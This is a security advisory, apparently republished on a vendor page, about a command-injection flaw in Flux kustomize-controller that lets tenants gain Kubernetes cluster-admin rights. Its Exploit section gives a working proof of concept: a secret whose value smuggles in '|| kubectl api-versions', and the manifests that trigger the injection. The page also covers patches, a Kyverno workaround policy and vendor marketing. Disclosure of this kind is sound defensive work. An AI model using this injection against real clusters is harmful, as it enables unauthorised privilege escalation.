GHSA-35rf-v2jv-gfg7
HIGHPrivilege escalation to cluster admin on multi-tenant environments
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/fluxcd/kustomize-controllerReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run kubectl commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.
Impact
Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.
Exploit
To exploit the command injection, first we create a secret with a shell command:
kubectl create secret generic exploit-token --from-literal=token=" || kubectl api-versions"
Then we create a Service Account that refers to the above Secret:
apiVersion: v1
kind: ServiceAccount
metadata:
name: exploit
namespace: default
automountServiceAccountToken: false
secrets:
- name: exploit-token
And finally a Kustomization that runs under the above Service Account:
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: exploit
namespace: default
spec:
interval: 5m
path: "./deploy/"
sourceRef:
kind: GitRepository
name: app
serviceAccountName: exploit
When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.
Patches
This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the kubectl binary has been removed from the container image.
Workarounds
To prevent the creation of Kubernetes Service Accounts with secrets in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-sa
spec:
validationFailureAction: enforce
background: false
rules:
- name: validate-sa
match:
resources:
kinds:
- ServiceAccount
namespaces:
- tenant1
- tenant2
subjects:
- kind: User
name: [email protected]
- kind: User
name: [email protected]
- kind: ServiceAccount
name: kustomize-controller
namespace: flux-system
- kind: ServiceAccount
name: helm-controller
namespace: flux-system
validate:
message: "Invalid service account"
pattern:
X(secrets): "*?"
References
Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.
For more information
If you have any questions or comments about this advisory:
- Open an issue in kustomize-controller repository
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/fluxcd/kustomize-controller | all versions | 0.15.0 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/fluxcd/kustomize-controller. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/fluxcd/kustomize-controller to 0.15.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-35rf-v2jv-gfg7 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-35rf-v2jv-gfg7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-35rf-v2jv-gfg7. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-35rf-v2jv-gfg7 in your dependencies?
O3 detects GHSA-35rf-v2jv-gfg7 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.